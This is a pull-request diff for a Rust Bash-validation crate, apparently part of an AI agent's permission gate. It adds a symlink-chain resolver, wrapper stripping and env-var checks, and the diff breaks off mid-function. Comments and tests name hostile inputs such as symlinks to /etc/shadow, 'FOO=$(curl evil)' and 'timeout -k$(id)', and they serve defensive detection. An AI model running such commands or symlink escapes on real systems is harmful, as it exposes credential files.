### PR TITLE
feat(bash-validation): FsResolver trait + POSIX impl + chain walker (Phase 3.1.g.1, ADR-150 Step 6.1)

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -2787,6 +2787,7 @@ dependencies = [
  "regex",
  "serde",
  "serde_json",
+ "tempfile",
  "thiserror 1.0.69",
  "tree-sitter",
 ]

--- a/crates/dasclaw_bash_validation/Cargo.toml
+++ b/crates/dasclaw_bash_validation/Cargo.toml
@@ -23,3 +23,4 @@ tree-sitter = "0.25.10"
 [dev-dependencies]
 serde = { version = "1", features = ["derive"] }
 serde_json = "1"
+tempfile = "3"

--- a/crates/dasclaw_bash_validation/src/fs_resolver.rs
+++ b/crates/dasclaw_bash_validation/src/fs_resolver.rs
@@ -1,0 +1,384 @@
+//! Filesystem-aware path resolver — Phase 3.1.g Step 6.1 (ADR-150).
+//!
+//! Adds the **minimum IO surface** needed by the symlink-escape pass
+//! that wraps `path_validation::validate_command_paths`. The IO surface
+//! is intentionally tiny:
+//!
+//! 1. [`FsResolver`] — three methods (`lstat_kind`, `readlink_absolute`,
+//!    `realpath`), each `Option`-returning. Returning `None` from any
+//!    method causes the outer walker to **Fail-Safe → Ask** for the
+//!    originating target (see ADR-150 §5).
+//! 2. [`FsEntryKind`] — file / dir / symlink / special. Special covers
+//!    FIFO / socket / char / block devices so the walker never
+//!    `realpath`s those (which would block on a missing writer).
+//! 3. [`NoopFsResolver`] — every method returns `None`. Equivalent to
+//!    "no IO available"; preserves the Phase 3.1.A behaviour (lexical
+//!    only) when callers do not want to pay the IO cost.
+//! 4. [`resolve_path_chain`] — mirrors upstream
+//!    `getPathsForPermissionCheck` (`fsOperations.ts:288-383`); walks
+//!    the symlink chain at most [`SYMLOOP_MAX`] hops, returning **all**
+//!    on-disk targets the original path could resolve to.
+//!
+//! POSIX-specific real implementation lives in
+//! [`real_posix`][crate::fs_resolver::real_posix]; it is gated behind
+//! `cfg(unix)`. Windows lives in a separate step (ADR-150 §6 Step 6.2).
+//!
+//! # Fail-Safe contract
+//!
+//! Per AGENTS.md "安全功能必须 Fail-Safe": every IO failure path here
+//! returns `None`/empty walk results. The outer
+//! `validate_command_paths_with_fs` then escalates the target to
+//! `PathValidationOutcome::Ask` (never `Allow`/`Passthrough`).
+
+use std::path::{Path, PathBuf};
+
+/// Maximum number of symlink hops to traverse before giving up.
+///
+/// Matches upstream `fsOperations.ts:298` `SYMLOOP_MAX = 40` so an
+/// audit trail of `chain.len() == 40` here means the same thing as
+/// upstream. POSIX systems differ (Linux: 40, macOS: 32, Windows: no
+/// defined limit); 40 is the maximum across the three.
+pub const SYMLOOP_MAX: usize = 40;
+
+/// Coarse-grained classification of a filesystem entry.
+///
+/// Mirrors the discriminant set used by upstream `safeResolvePath`
+/// (`fsOperations.ts:131-150`). The walker treats `Special` specially:
+/// it stops the chain walk without calling `realpath` (FIFOs would
+/// otherwise hang waiting for a writer).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum FsEntryKind {
+    /// Regular file.
+    File,
+    /// Directory.
+    Dir,
+    /// Symbolic link (or Windows reparse point with `IO_REPARSE_TAG_SYMLINK`).
+    Symlink,
+    /// FIFO, socket, character or block device. Walker stops here.
+    Special,
+}
+
+/// Minimum filesystem surface the symlink-escape walker needs.
+///
+/// All methods MUST be infallible-from-the-caller's-perspective —
+/// callers translate `None` into [`PathValidationOutcome::Ask`][crate::path_validation::PathValidationOutcome::Ask].
+///
+/// **Why `Option`, not `Result`**: the walker does not need to
+/// distinguish ENOENT from EACCES from ELOOP — they all mean "we
+/// cannot trust this path → Fail-Safe Ask". Propagating a typed error
+/// up would only enable callers to relax the contract, which the
+/// safety design forbids (see ADR-150 §5).
+pub trait FsResolver {
+    /// Equivalent of POSIX `lstat(2)` — does **not** follow the final
+    /// symlink. Returns `None` for ENOENT, EACCES, ELOOP, EIO, or any
+    /// other IO error.
+    fn lstat_kind(&self, path: &Path) -> Option<FsEntryKind>;
+
+    /// Equivalent of POSIX `readlink(2)`. Relative targets must be
+    /// resolved against the symlink's **parent** directory (matches
+    /// upstream `path.resolve(dirname(p), target)` semantics in
+    /// `fsOperations.ts:319-324`). Returns `None` if the path is not
+    /// a symlink, the link is broken, or IO fails.
+    fn readlink_absolute(&self, path: &Path) -> Option<PathBuf>;
+
+    /// Equivalent of POSIX `realpath(3)` — best-effort canonicalisation
+    /// of the deepest existing ancestor. Mirrors upstream
+    /// `resolveDeepestExistingAncestorSync` (`fsOperations.ts:217-262`).
+    ///
+    /// Returns `None` if even the path's first existing ancestor
+    /// cannot be canonicalised; callers then Ask.
+    fn realpath(&self, path: &Path) -> Option<PathBuf>;
+}
+
+/// IO-disabled resolver: every method returns `None`.
+///
+/// `validate_command_paths_with_fs(.., &NoopFsResolver)` collapses to
+/// the pure-string behaviour from Phase 3.1.A — the walker emits an
+/// empty chain and the outer validator runs unchanged.
+///
+/// Useful for:
+/// - Callers that do not want to pay the IO cost (e.g. early gates).
+/// - Unit tests of the pure-string layer.
+#[derive(Debug, Default, Clone, Copy)]
+pub struct NoopFsResolver;
+
+impl FsResolver for NoopFsResolver {
+    fn lstat_kind(&self, _path: &Path) -> Option<FsEntryKind> {
+        None
+    }
+    fn readlink_absolute(&self, _path: &Path) -> Option<PathBuf> {
+        None
+    }
+    fn realpath(&self, _path: &Path) -> Option<PathBuf> {
+        None
+    }
+}
+
+/// Outcome of [`resolve_path_chain`] — the on-disk targets a single
+/// input path can resolve to, plus a flag indicating whether the
+/// chain walk gave up (max-depth, IO error, or Special-file early
+/// exit).
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct ResolvedChain {
+    /// Distinct absolute paths visited by the walker, in walk order.
+    /// The first element is always the original input (after
+    /// lexical normalisation by the caller). The last element is the
+    /// final resolved target if `terminated_cleanly` is `true`.
+    pub steps: Vec<PathBuf>,
+    /// `false` when the walker bailed out (loop, max-depth, IO
+    /// failure). Callers MUST treat the chain as untrustworthy in
+    /// that case (Fail-Safe Ask).
+    pub terminated_cleanly: bool,
+}
+
+/// Walks the symlink chain rooted at `start`, returning every
+/// distinct path the walker visits.
+///
+/// Algorithm mirrors upstream `getPathsForPermissionCheck`:
+/// 1. `lstat` current step.
+/// 2. If it's a regular file/dir → stop (clean).
+/// 3. If it's a Special (FIFO/socket/etc.) → stop (clean, do NOT
+///    realpath; matches upstream `safeResolvePath:131-150`).
+/// 4. If it's a symlink → `readlink_absolute`, push the target,
+///    loop.
+/// 5. If the target was visited before → loop detected, stop (NOT
+///    clean).
+/// 6. If `lstat_kind` / `readlink_absolute` returns `None` → IO
+///    failure, fall back to `realpath(start)` for one last attempt;
+///    if that's also `None`, give up (NOT clean).
+/// 7. If we exceed [`SYMLOOP_MAX`] hops → give up (NOT clean).
+///
+/// Returns the walk **in addition to** the original `start` path
+/// (which is always `steps[0]`), so callers can run
+/// `path_in_workspace` on every step without separately remembering
+/// the original.
+#[must_use]
+pub fn resolve_path_chain(start: &Path, fs: &dyn FsResolver) -> ResolvedChain {
+    let mut steps: Vec<PathBuf> = Vec::with_capacity(2);
+    steps.push(start.to_path_buf());
+
+    let mut current = start.to_path_buf();
+
+    for _hop in 0..SYMLOOP_MAX {
+        match fs.lstat_kind(&current) {
+            Some(FsEntryKind::Symlink) => {
+                let Some(target) = fs.readlink_absolute(&current) else {
+                    return ResolvedChain {
+                        steps,
+                        terminated_cleanly: false,
+                    };
+                };
+                if steps.iter().any(|s| s == &target) {
+                    // Loop detected — record the offending step but
+                    // do NOT append it again (avoid unbounded growth
+                    // on synthetic cycles in tests).
+                    return ResolvedChain {
+                        steps,
+                        terminated_cleanly: false,
+                    };
+                }
+                steps.push(target.clone());
+                current = target;
+            }
+            Some(FsEntryKind::File | FsEntryKind::Dir | FsEntryKind::Special) => {
+                return ResolvedChain {
+                    steps,
+                    terminated_cleanly: true,
+                };
+            }
+            None => {
+                // IO failed (or path doesn't exist). Last-ditch:
+                // realpath the deepest existing ancestor.
+                if let Some(rp) = fs.realpath(&current) {
+                    if !steps.iter().any(|s| s == &rp) {
+                        steps.push(rp);
+                    }
+                    return ResolvedChain {
+                        steps,
+                        terminated_cleanly: true,
+                    };
+                }
+                return ResolvedChain {
+                    steps,
+                    terminated_cleanly: false,
+                };
+            }
+        }
+    }
+    // Exceeded SYMLOOP_MAX.
+    ResolvedChain {
+        steps,
+        terminated_cleanly: false,
+    }
+}
+
+#[cfg(unix)]
+pub mod real_posix;
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::collections::HashMap;
+
+    /// In-memory FS for hermetic walker tests. Maps absolute path →
+    /// (kind, optional symlink target).
+    #[derive(Default)]
+    struct MockFs {
+        entries: HashMap<PathBuf, (FsEntryKind, Option<PathBuf>)>,
+    }
+
+    impl MockFs {
+        fn add(&mut self, path: &str, kind: FsEntryKind, link_target: Option<&str>) {
+            self.entries
+                .insert(PathBuf::from(path), (kind, link_target.map(PathBuf::from)));
+        }
+    }
+
+    impl FsResolver for MockFs {
+        fn lstat_kind(&self, path: &Path) -> Option<FsEntryKind> {
+            self.entries.get(path).map(|(k, _)| *k)
+        }
+        fn readlink_absolute(&self, path: &Path) -> Option<PathBuf> {
+            self.entries.get(path).and_then(|(_, t)| t.clone())
+        }
+        fn realpath(&self, path: &Path) -> Option<PathBuf> {
+            // Mock: realpath returns the path itself if and only if
+            // it exists; otherwise None. Real impls follow more
+            // complex ancestor-walking semantics — covered in
+            // `real_posix`.
+            self.entries.contains_key(path).then(|| path.to_path_buf())
+        }
+    }
+
+    #[test]
+    fn noop_resolver_returns_none_everywhere() {
+        let n = NoopFsResolver;
+        assert!(n.lstat_kind(Path::new("/x")).is_none());
+        assert!(n.readlink_absolute(Path::new("/x")).is_none());
+        assert!(n.realpath(Path::new("/x")).is_none());
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_1_workspace_link_to_etc() {
+        // T-SYM-1: ws/leak -> /etc; reading /ws/leak must surface
+        // /etc to the workspace gate.
+        let mut fs = MockFs::default();
+        fs.add("/ws/leak", FsEntryKind::Symlink, Some("/etc"));
+        fs.add("/etc", FsEntryKind::Dir, None);
+        let chain = resolve_path_chain(Path::new("/ws/leak"), &fs);
+        assert!(chain.terminated_cleanly);
+        assert_eq!(chain.steps[0], PathBuf::from("/ws/leak"));
+        assert_eq!(chain.steps.last().unwrap(), &PathBuf::from("/etc"));
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_2_dangling_link_realpath_none() {
+        // T-SYM-2: dangling symlink — lstat None on the target.
+        let mut fs = MockFs::default();
+        fs.add("/ws/evil", FsEntryKind::Symlink, Some("/missing"));
+        // /missing not registered → lstat returns None → realpath
+        // also None → Fail-Safe.
+        let chain = resolve_path_chain(Path::new("/ws/evil"), &fs);
+        assert!(!chain.terminated_cleanly);
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_3_multi_hop_links_all_visited() {
+        // T-SYM-3: A -> B -> /etc/shadow; the middle hop must be
+        // visible to the gate too.
+        let mut fs = MockFs::default();
+        fs.add("/ws/a", FsEntryKind::Symlink, Some("/ws/b"));
+        fs.add("/ws/b", FsEntryKind::Symlink, Some("/etc/shadow"));
+        fs.add("/etc/shadow", FsEntryKind::File, None);
+        let chain = resolve_path_chain(Path::new("/ws/a"), &fs);
+        assert!(chain.terminated_cleanly);
+        assert_eq!(chain.steps.len(), 3);
+        assert_eq!(chain.steps[1], PathBuf::from("/ws/b"));
+        assert_eq!(chain.steps[2], PathBuf::from("/etc/shadow"));
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_4_loop_terminates_uncleanly() {
+        // T-SYM-4: A -> B -> A loop; walker must give up without
+        // OOM and mark the chain unclean.
+        let mut fs = MockFs::default();
+        fs.add("/ws/a", FsEntryKind::Symlink, Some("/ws/b"));
+        fs.add("/ws/b", FsEntryKind::Symlink, Some("/ws/a"));
+        let chain = resolve_path_chain(Path::new("/ws/a"), &fs);
+        assert!(!chain.terminated_cleanly);
+        // Loop detected on the 3rd hop attempt — steps capped at 2.
+        assert_eq!(chain.steps.len(), 2);
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_7_special_file_stops_walk_cleanly() {
+        // T-SYM-7: FIFO target — walker must stop without realpath,
+        // chain is clean (Special files have well-defined identity).
+        let mut fs = MockFs::default();
+        fs.add("/ws/pipe", FsEntryKind::Special, None);
+        let chain = resolve_path_chain(Path::new("/ws/pipe"), &fs);
+        assert!(chain.terminated_cleanly);
+        assert_eq!(chain.steps.len(), 1);
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_t_sym_8_tilde_expanded_path_walks_normally() {
+        // T-SYM-8: caller already expanded `~/.cache` → /home/u/.cache
+        // before invoking the walker. The walker just sees an
+        // absolute path and follows.
+        let mut fs = MockFs::default();
+        fs.add("/home/u/.cache", FsEntryKind::Symlink, Some("/etc/secret"));
+        fs.add("/etc/secret", FsEntryKind::File, None);
+        let chain = resolve_path_chain(Path::new("/home/u/.cache"), &fs);
+        assert!(chain.terminated_cleanly);
+        assert_eq!(chain.steps.last().unwrap(), &PathBuf::from("/etc/secret"));
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_max_depth_terminates_uncleanly() {
+        // Deep chain longer than SYMLOOP_MAX must Fail-Safe even
+        // without an explicit cycle.
+        let mut fs = MockFs::default();
+        for i in 0..(SYMLOOP_MAX + 5) {
+            let from = format!("/ws/n{i}");
+            let to = format!("/ws/n{}", i + 1);
+            fs.add(&from, FsEntryKind::Symlink, Some(&to));
+        }
+        let chain = resolve_path_chain(Path::new("/ws/n0"), &fs);
+        assert!(!chain.terminated_cleanly);
+        assert!(chain.steps.len() <= SYMLOOP_MAX + 1);
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_chain_realpath_fallback_used_when_lstat_none() {
+        // When lstat returns None, the walker tries realpath once.
+        // Custom resolver: lstat always None, realpath returns
+        // /resolved.
+        struct Resolver;
+        impl FsResolver for Resolver {
+            fn lstat_kind(&self, _: &Path) -> Option<FsEntryKind> {
+                None
+            }
+            fn readlink_absolute(&self, _: &Path) -> Option<PathBuf> {
+                None
+            }
+            fn realpath(&self, _: &Path) -> Option<PathBuf> {
+                Some(PathBuf::from("/resolved"))
+            }
+        }
+        let chain = resolve_path_chain(Path::new("/missing"), &Resolver);
+        assert!(chain.terminated_cleanly);
+        assert_eq!(chain.steps.last().unwrap(), &PathBuf::from("/resolved"));
+    }
+
+    #[test]
+    fn req_safety_490_3_1_g_noop_resolver_produces_unclean_singleton() {
+        // NoopFsResolver: lstat None, realpath None → unclean chain
+        // with just the original path. Caller can then choose to
+        // Pass (preserving 3.1.A behaviour) or Ask, but the walker
+        // itself flags the chain untrustworthy.
+        let chain = resolve_path_chain(Path::new("/anything"), &NoopFsResolver);
+        assert!(!chain.terminated_cleanly);
+        assert_eq!(chain.steps.len(), 1);
+    }
+}

--- a/crates/dasclaw_bash_validation/src/fs_resolver/real_posix.rs
+++ b/crates/dasclaw_bash_validation/src/fs_resolver/real_posix.rs
@@ -1,0 +1,176 @@
+//! POSIX implementation of [`FsResolver`][super::FsResolver].
+//!
+//! Unix-only (`cfg(unix)`). Uses `std::fs::symlink_metadata` for
+//! `lstat`, `std::fs::read_link` for `readlink`, and a
+//! deepest-existing-ancestor walk for `realpath` (mirrors upstream
+//! `resolveDeepestExistingAncestorSync` in `fsOperations.ts:217-262`).
+//!
+//! All errors collapse to `None` per the [`FsResolver`][super::FsResolver]
+//! contract; no `unwrap`/`expect` in production paths.
+
+use std::fs;
+use std::os::unix::fs::FileTypeExt;
+use std::path::{Path, PathBuf};
+
+use super::{FsEntryKind, FsResolver};
+
+/// Real POSIX filesystem resolver.
+///
+/// **Cost notice**: every call performs at least one syscall. Callers
+/// inside hot loops (e.g. permission gates per command) should batch
+/// or cache, not call this per `Path`. The walker in
+/// [`resolve_path_chain`][super::resolve_path_chain] makes at most
+/// `SYMLOOP_MAX = 40` calls per starting path, which is acceptable
+/// for per-Bash-invocation validation.
+#[derive(Debug, Default, Clone, Copy)]
+pub struct RealFsResolver;
+
+impl FsResolver for RealFsResolver {
+    fn lstat_kind(&self, path: &Path) -> Option<FsEntryKind> {
+        let md = fs::symlink_metadata(path).ok()?;
+        let ft = md.file_type();
+        if ft.is_symlink() {
+            Some(FsEntryKind::Symlink)
+        } else if ft.is_dir() {
+            Some(FsEntryKind::Dir)
+        } else if ft.is_file() {
+            Some(FsEntryKind::File)
+        } else if ft.is_fifo() || ft.is_socket() || ft.is_char_device() || ft.is_block_device() {
+            Some(FsEntryKind::Special)
+        } else {
+            // Unknown type — treat conservatively as Special so the
+            // walker stops without dereferencing.
+            Some(FsEntryKind::Special)
+        }
+    }
+
+    fn readlink_absolute(&self, path: &Path) -> Option<PathBuf> {
+        let target = fs::read_link(path).ok()?;
+        if target.is_absolute() {
+            Some(target)
+        } else {
+            // Relative — resolve against the symlink's parent
+            // (matches upstream `path.resolve(dirname(p), target)`).
+            let parent = path.parent()?;
+            Some(parent.join(target))
+        }
+    }
+
+    fn realpath(&self, path: &Path) -> Option<PathBuf> {
+        // Fast path: canonicalize works → done.
+        if let Ok(rp) = fs::canonicalize(path) {
+            return Some(rp);
+        }
+        // Slow path: walk up until we find an existing ancestor,
+        // canonicalize that, rejoin the missing tail. Mirrors
+        // `resolveDeepestExistingAncestorSync`.
+        let mut tail: Vec<&std::ffi::OsStr> = Vec::new();
+        let mut cursor = path;
+        loop {
+            let parent = cursor.parent()?;
+            if let Some(name) = cursor.file_name() {
+                tail.push(name);
+            }
+            if let Ok(rp) = fs::canonicalize(parent) {
+                let mut out = rp;
+                for seg in tail.iter().rev() {
+                    out.push(seg);
+                }
+                return Some(out);
+            }
+            if parent.as_os_str().is_empty() || parent == cursor {
+                return None;
+            }
+            cursor = parent;
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::os::unix::fs::symlink;
+    use tempfile::TempDir;
+
+    #[test]
+    fn real_resolver_classifies_regular_file_as_file() {
+        let dir = TempDir::new().unwrap();
+        let f = dir.path().join("a.txt");
+        fs::write(&f, b"x").unwrap();
+        assert_eq!(RealFsResolver.lstat_kind(&f), Some(FsEntryKind::File));
+    }
+
+    #[test]
+    fn real_resolver_classifies_directory_as_dir() {
+        let dir = TempDir::new().unwrap();
+        assert_eq!(
+            RealFsResolver.lstat_kind(dir.path()),
+            Some(FsEntryKind::Dir)
+        );
+    }
+
+    #[test]
+    fn real_resolver_classifies_symlink_as_symlink() {
+        let dir = TempDir::new().unwrap();
+        let target = dir.path().join("real");
+        fs::write(&target, b"x").unwrap();
+        let link = dir.path().join("alias");
+        symlink(&target, &link).unwrap();
+        assert_eq!(RealFsResolver.lstat_kind(&link), Some(FsEntryKind::Symlink));
+    }
+
+    #[test]
+    fn real_resolver_lstat_missing_returns_none() {
+        assert!(RealFsResolver
+            .lstat_kind(Path::new("/nonexistent/3.1.g.1/probe"))
+            .is_none());
+    }
+
+    #[test]
+    fn real_resolver_readlink_absolutifies_relative_target() {
+        let dir = TempDir::new().unwrap();
+        let target = dir.path().join("real");
+        fs::write(&target, b"x").unwrap();
+        let link = dir.path().join("alias");
+        // Create a *relative* symlink so we can verify the
+        // parent-relative resolution rule.
+        symlink("real", &link).unwrap();
+        let got = RealFsResolver.readlink_absolute(&link).unwrap();
+        assert_eq!(got, dir.path().join("real"));
+    }
+
+    #[test]
+    fn real_resolver_readlink_keeps_absolute_target_absolute() {
+        let dir = TempDir::new().unwrap();
+        let link = dir.path().join("abslink");
+        symlink("/tmp/some-abs-target", &link).unwrap();
+        let got = RealFsResolver.readlink_absolute(&link).unwrap();
+        assert_eq!(got, PathBuf::from("/tmp/some-abs-target"));
+    }
+
+    #[test]
+    fn real_resolver_realpath_resolves_existing_path() {
+        let dir = TempDir::new().unwrap();
+        let f = dir.path().join("real");
+        fs::write(&f, b"x").unwrap();
+        let got = RealFsResolver.realpath(&f).unwrap();
+        // canonicalize resolves the temp dir prefix (e.g. macOS
+        // /var → /private/var); we only assert it agrees with
+        // canonicalize().
+        assert_eq!(got, fs::canonicalize(&f).unwrap());
+    }
+
+    #[test]
+    fn real_resolver_realpath_walks_to_deepest_existing_ancestor() {
+        let dir = TempDir::new().unwrap();
+        let missing = dir.path().join("does-not-exist/leaf");
+        let got = RealFsResolver.realpath(&missing).unwrap();
+        // The existing ancestor is `dir.path()`; the tail
+        // `does-not-exist/leaf` is appended in original order.
+        let expected = fs::canonicalize(dir.path())
+            .unwrap()
+            .join("does-not-exist")
+            .join("leaf");
+        assert_eq!(got, expected);
+    }
+}

--- a/crates/dasclaw_bash_validation/src/lib.rs
+++ b/crates/dasclaw_bash_validation/src/lib.rs
@@ -14,16 +14,18 @@
 
 use std::path::Path;
 
+pub mod fs_resolver;
 pub mod path_constraints;
 pub mod path_validation;
 pub mod permissions;
 pub mod redirects;
 pub mod security;
+pub use fs_resolver::{FsEntryKind, FsResolver, NoopFsResolver, ResolvedChain, SYMLOOP_MAX};
 pub use path_constraints::{check_path_constraints, validate_output_redirections};
 pub use path_validation::{
     check_dangerous_removal_paths, expand_tilde_and_home, extract_paths, has_unsafe_expansion,
-    is_dangerous_removal_path, validate_command_paths, FileOperationType, PathCommand,
-    PathValidationOutcome,
+    is_dangerous_removal_path, validate_command_paths, validate_command_paths_with_fs,
+    FileOperationType, PathCommand, PathValidationOutcome,
 };
 pub use permissions::PermissionMode;
 pub use redirects::{

--- a/crates/dasclaw_bash_validation/src/path_constraints.rs
+++ b/crates/dasclaw_bash_validation/src/path_constraints.rs
@@ -11,10 +11,6 @@
 //!
 //! ## Out of scope (deferred slices)
 //!
-//! - **Wrapper stripping (S9)** — `timeout 5 cat /etc/passwd` collapsing to
-//!   `cat /etc/passwd` requires porting `stripSafeWrappers` (HackerOne-level
-//!   multi-line regex, see `claude-code-main/.../bashPermissions.ts:524`).
-//!   Tracked as 3.1.B.2 follow-up.
 //! - **Hook wireup** — making `BashValidationHook::before_tool_call` actually
 //!   call [`check_path_constraints`] and emit `DecisionReason::PathOutOfWorkspace`
 //!   is Phase 3.1.C.
@@ -155,7 +151,11 @@ pub fn check_path_constraints(
     };
 
     for argv in &commands {
-        let Some((base, args)) = argv.split_first() else {
+        // Phase 3.1.B.2: peel safe wrappers (time/nohup/timeout/nice/stdbuf)
+        // so the *real* base command is dispatched. Mirrors upstream
+        // `stripWrappersFromArgv` (claude-code-main/.../bashPermissions.ts:677).
+        let stripped = strip_wrappers_from_argv(argv);
+        let Some((base, args)) = stripped.split_first() else {
             continue;
         };
         let Some(cmd) = PathCommand::parse(base) else {
@@ -220,9 +220,11 @@ fn extract_commands_for_path_check(
 fn extract_argv(cmd: Node<'_>, src: &[u8]) -> Result<Vec<String>, &'static str> {
     let mut argv = Vec::new();
     let mut cursor = cmd.walk();
+    let mut seen_command_name = false;
     for child in cmd.named_children(&mut cursor) {
         match child.kind() {
             "command_name" => {
+                seen_command_name = true;
                 let inner = child
                     .named_child(0)
                     .ok_or("command_name without inner word")?;
@@ -239,12 +241,18 @@ fn extract_argv(cmd: Node<'_>, src: &[u8]) -> Result<Vec<String>, &'static str> 
             "string" => argv.push(literal_double_quoted(child, src)?),
             "raw_string" => argv.push(literal_raw_string(child, src)?),
             "concatenation" => argv.push(literal_concatenation(child, src)?),
-            // `variable_assignment` like `FOO=bar cmd` — we don't
-            // currently strip these (3.1.B.2 wrapper stripping will). Treat
-            // as Fail-Closed so that env-var smuggling can't bypass the
-            // gate.
+            // Phase 3.1.B.2: `variable_assignment` like `FOO=bar cmd` —
+            // tree-sitter-bash emits these as named children that appear
+            // BEFORE `command_name`. They are AST-level env-var prefixes,
+            // not argv tokens, so we skip them (the AST already gave us the
+            // structural separation upstream achieves via regex). Values
+            // bearing runtime expansion (`FOO=$(curl evil)`) Fail-Closed.
             "variable_assignment" => {
-                return Err("leading variable assignment requires wrapper stripping (S9)");
+                if seen_command_name {
+                    return Err("variable assignment after command name");
+                }
+                check_variable_assignment_literal(child, src)?;
+                continue;
             }
             // Any expansion / substitution → can't classify literally.
             "simple_expansion"
@@ -306,6 +314,303 @@ fn literal_concatenation(node: Node<'_>, src: &[u8]) -> Result<String, &'static 
         out.push_str(&literal_word(child, src)?);
     }
     Ok(out)
+}
+
+/// Verify that a `variable_assignment` node's *value* is a static literal
+/// (no command substitution, parameter expansion, arithmetic, or process
+/// substitution). The name side is always a literal `variable_name`.
+///
+/// We deliberately do **not** consult a safe-list of variable names here —
+/// the argv-level path gate corresponds to upstream `stripAllLeadingEnvVars`
+/// (bashPermissions.ts:732): for path validation we want to peel *any*
+/// literal env prefix so the real command can be classified. Allow-rule
+/// matching applies the safe-list separately at a higher layer.
+fn check_variable_assignment_literal(node: Node<'_>, src: &[u8]) -> Result<(), &'static str> {
+    let mut cursor = node.walk();
+    for child in node.named_children(&mut cursor) {
+        match child.kind() {
+            // Literal name parts.
+            "variable_name" | "subscript" => continue,
+            // Literal value parts — re-validate via the same literal-word
+            // gate used for argv so quoted forms with expansion are caught.
+            "word" | "number" | "raw_string" => continue,
+            "string" => {
+                literal_double_quoted(child, src)?;
+            }
+            "concatenation" => {
+                literal_concatenation(child, src)?;
+            }
+            "array" => return Err("env-var array assignment is not statically classifiable"),
+            "simple_expansion"
+            | "expansion"
+            | "command_substitution"
+            | "process_substitution"
+            | "arithmetic_expansion" => {
+                return Err("env-var value contains runtime expansion");
+            }
+            _ => return Err("env-var assignment has unrecognized AST node"),
+        }
+    }
+    Ok(())
+}
+
+/// Argv-level wrapper stripper. Mirrors upstream `stripWrappersFromArgv`
+/// (claude-code-main/src/tools/BashTool/bashPermissions.ts:677).
+///
+/// Peels iteratively while the head matches one of:
+///
+/// - `time` / `nohup` — bare wrapper, optional `--` after
+/// - `timeout [flags] <duration> …` — flag set per [`skip_timeout_flags`]
+/// - `nice [-n N | -N]?` — bare / `-n N` / `-N` forms, optional `--` after
+/// - `stdbuf -i… -o… -e…` — at least one fused IO-buffer flag, optional `--`
+///
+/// SECURITY: an unrecognized form (e.g. `timeout -k$(id) 5 ls` where the
+/// fused short flag fails `[A-Za-z0-9_.+-]+` validation) returns the input
+/// **unchanged**. That keeps `baseCmd='timeout'` outside the
+/// [`PathCommand`] dispatch table, which is Fail-Closed because callers
+/// have already Fail-Closed Ask'd on the runtime expansion in
+/// `extract_argv`.
+///
+/// SECURITY PIN **S9**: `timeout 5 cat /etc/passwd`, `nice rm -rf /tmp/x`,
+/// `time cat /etc/passwd`, `nohup -- rm /tmp/sec`, `stdbuf -o0 cat /etc/passwd`
+/// must all reach [`validate_command_paths`] under the real base command,
+/// not silently passthrough on the wrapper name.
+#[must_use]
+pub(crate) fn strip_wrappers_from_argv(argv: &[String]) -> &[String] {
+    let mut a = argv;
+    loop {
+        let Some(head) = a.first() else { return a };
+        let consumed = match head.as_str() {
+            "time" | "nohup" => peel_simple_wrapper(a),
+            "timeout" => peel_timeout(a),
+            "nice" => peel_nice(a),
+            "stdbuf" => peel_stdbuf(a),
+            _ => return a,
+        };
+        match consumed {
+            Some(n) if n <= a.len() => {
+                let next = &a[n..];
+                // Defensive: if we somehow didn't make progress, abort to
+                // avoid an infinite loop. (Cannot trigger with current
+                // peel_* helpers but keeps the loop total.)
+                if next.len() == a.len() {
+                    return a;
+                }
+                a = next;
+            }
+            // Cannot consume (unparseable flags, or out-of-bounds slice).
+            // Return what we have — upstream also bails out unchanged.
+            _ => return a,
+        }
+    }
+}
+
+/// Peel `time`/`nohup` and an optional `--` end-of-options marker.
+fn peel_simple_wrapper(a: &[String]) -> Option<usize> {
+    if a.get(1).map(String::as_str) == Some("--") {
+        Some(2)
+    } else {
+        Some(1)
+    }
+}
+
+/// Peel `timeout [flags] <duration>`. Returns the number of tokens to
+/// consume, or `None` if flags or duration are unrecognized.
+fn peel_timeout(a: &[String]) -> Option<usize> {
+    let i = skip_timeout_flags(a)?;
+    let dur = a.get(i)?;
+    if !is_timeout_duration(dur) {
+        return None;
+    }
+    Some(i + 1)
+}
+
+/// Mirror of upstream `skipTimeoutFlags` (bashPermissions.ts:634).
+/// Returns the argv index of the DURATION token after flags, or `None`
+/// when an unrecognized flag is encountered.
+fn skip_timeout_flags(a: &[String]) -> Option<usize> {
+    let mut i = 1;
+    while let Some(arg) = a.get(i) {
+        let arg = arg.as_str();
+        let next = a.get(i + 1).map(String::as_str);
+
+        // Long flags without value.
+        if matches!(arg, "--foreground" | "--preserve-status" | "--verbose") {
+            i += 1;
+        }
+        // Long flags with fused value: --kill-after=5, --signal=TERM.
+        else if let Some(rest) = arg.strip_prefix("--kill-after=") {
+            if !is_timeout_flag_value(rest) {
+                return None;
+            }
+            i += 1;
+        } else if let Some(rest) = arg.strip_prefix("--signal=") {
+            if !is_timeout_flag_value(rest) {
+                return None;
+            }
+            i += 1;
+        }
+        // Long flags with separate value.
+        else if matches!(arg, "--kill-after" | "--signal") {
+            let v = next?;
+            if !is_timeout_flag_value(v) {
+                return None;
+            }
+            i += 2;
+        }
+        // End-of-options marker.
+        else if arg == "--" {
+            i += 1;
+            break;
+        }
+        // Any other long flag: unrecognized, abort.
+        else if arg.starts_with("--") {
+            return None;
+        }
+        // Short flags without value.
+        else if arg == "-v" {
+            i += 1;
+        }
+        // Short -k/-s with separate value.
+        else if matches!(arg, "-k" | "-s") {
+            let v = next?;
+            if !is_timeout_flag_value(v) {
+                return None;
+            }
+            i += 2;
+        }
+        // Short -kVAL / -sVAL fused.
+        else if let Some(rest) = arg.strip_prefix("-k").or_else(|| arg.strip_prefix("-s")) {
+            if rest.is_empty() || !is_timeout_flag_value(rest) {
+                return None;
+            }
+            i += 1;
+        }
